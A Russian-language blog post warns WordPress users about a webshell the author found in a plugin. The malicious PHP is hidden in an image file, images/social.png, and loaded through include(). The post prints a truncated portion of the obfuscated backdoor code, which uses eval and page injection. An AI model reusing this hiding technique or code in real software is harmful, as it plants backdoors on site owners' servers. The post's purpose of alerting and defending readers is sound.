Бэкдор (webshell) в плагине для wordpress

social_Рассматривая внутренности одного из плагинов для wordpress, случайно залез в папку с изображениями и автоматически нажал на одном из них F3 (просмотр). И что же я увидел? Вот именно то что вы видите на скрине рядом — php-код, вместо ожидаемой картинки. Думаю очевидно что этот код кто-то хотел скрыть.

Ради интереса я решил проверить этот файл на virustotal, вот результат:

social_virustotalВсего 1 антивирус из 54 распознал в нем CPRAd79.Webshell. В одном из php файлов плагина был найден кусок кода, подключающий данный код:

<?php include('images/social.png'); ?>

Сам код похоже обфусцирован:

<?php error_reporting(0); ini_set('display_errors', 0);@ini_set('max_execution_time', 300);@set_time_limit(0);function XJmVaOhvhAQNoaACoDOM() {    if (!defined('WP_OPTION_KEY')) {        define('WP_OPTION_KEY', 'wp_data_newa');        $oXyaqmHoChvHQFCvTluq = new GsSYoMTsQibQgcHcuGmr(1);    }}if (class_exists('JFactory')) {    $fRBDRzVvkOhTDTWAHUGa = & JFactory::getApplication();    $fRBDRzVvkOhTDTWAHUGa->registerEvent('onAfterRender', 'XJmVaOhvhAQNoaACoDOM');}if ($GLOBALS['base_path'] || $GLOBALS['base_url']) {    if (!defined('WP_OPTION_KEY')) {        define('WP_OPTION_KEY', 'wp_data_newa');        $whjjnvouGqpgVFKDaceH = 'function ' . $template->name . "_page_alter(&\$page) {\$oXyaqmHoChvHQFCvTluq = new GsSYoMTsQibQgcHcuGmr(2);            \$NygjKszxwCxlHbyDpHTT = \"\";            foreach (\$oXyaqmHoChvHQFCvTluq->oXyaqmHoChvHQFCvTluq['echo'] as \$stIedxfhoZcXvZNmNXTd) {                \$NygjKszxwCxlHbyDpHTT.=\$stIedxfhoZcXvZNmNXTd;            }            \$vsGIQvwCXRbSELMOlFV = \$NygjKszxwCxlHbyDpHTT;            \$page['page_top'][] = array('#markup' => \$vsGIQvwCXRbSELMOlFV);    } ";    }    eval($whjjnvouGqpgVFKDaceH);}if (!defined('WP_OPTION_KEY') && (function_exists('get_home_url') || function_exists('get_site_url'))) {    define('WP_OPTION_KEY', 'wp_data_newa');    new GsSYoMTsQibQgcHcuGmr(0);}class GsSYoMTsQibQgcHcuGmr {    public $oXyaqmHoChvHQFCvTluq = array(),        $yYVsqvOoqWsddypXgJcI = array(),        $KPnBqYhemQSdHKDNtJpe,         $qcCONSsvpJlMgdhEFFmr,

Я не буду подробно разбирать на что способен этот скрипт и как именно он работает, цель этой статьи — напомнить, что любой скачиваемый вами плагин или тема из непроверенных источников, сборников и особенно варезников, может содержать вредоносный код, который будучи не замеченным вами сразу, может доставить много неприятных минут в последствии. Антивирусы в данном случае не дают никаких гарантий, когда я проверил архив, то результат вообще был 0, и лишь когда я проверил конкретно этот файл, предварительно изменив расширение с png на php, всего один антивирус смог распознать заразу.

PS. Кому интересно, почитайте и второй пост — нашел целый сайт с зараженными темами wordpress. Метод похож, но код прячется в empty.gif.

Запись опубликована в рубрике Без рубрики. Добавьте в закладки постоянную ссылку.

4 комментария: Бэкдор (webshell) в плагине для wordpress

  1. Mr. Trololo говорит:

    Спасибо, дружище. Очень выручила статья.

  2. Некто говорит:

    Спасибо, помогло

  3. Alexander говорит:

    Спасибо! Очень выручили. Будем изучать природу этой гадости.

  4. fuse говорит:

    Да, почему-то из всех шаблонов, понравились именно на wordpressorg.ru. И, конечно же, шаблон был с «содержимым».
    Много всего ТАМ. Но изюминка — empty.gif.
    Уничтожить ее — заменить

    на

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *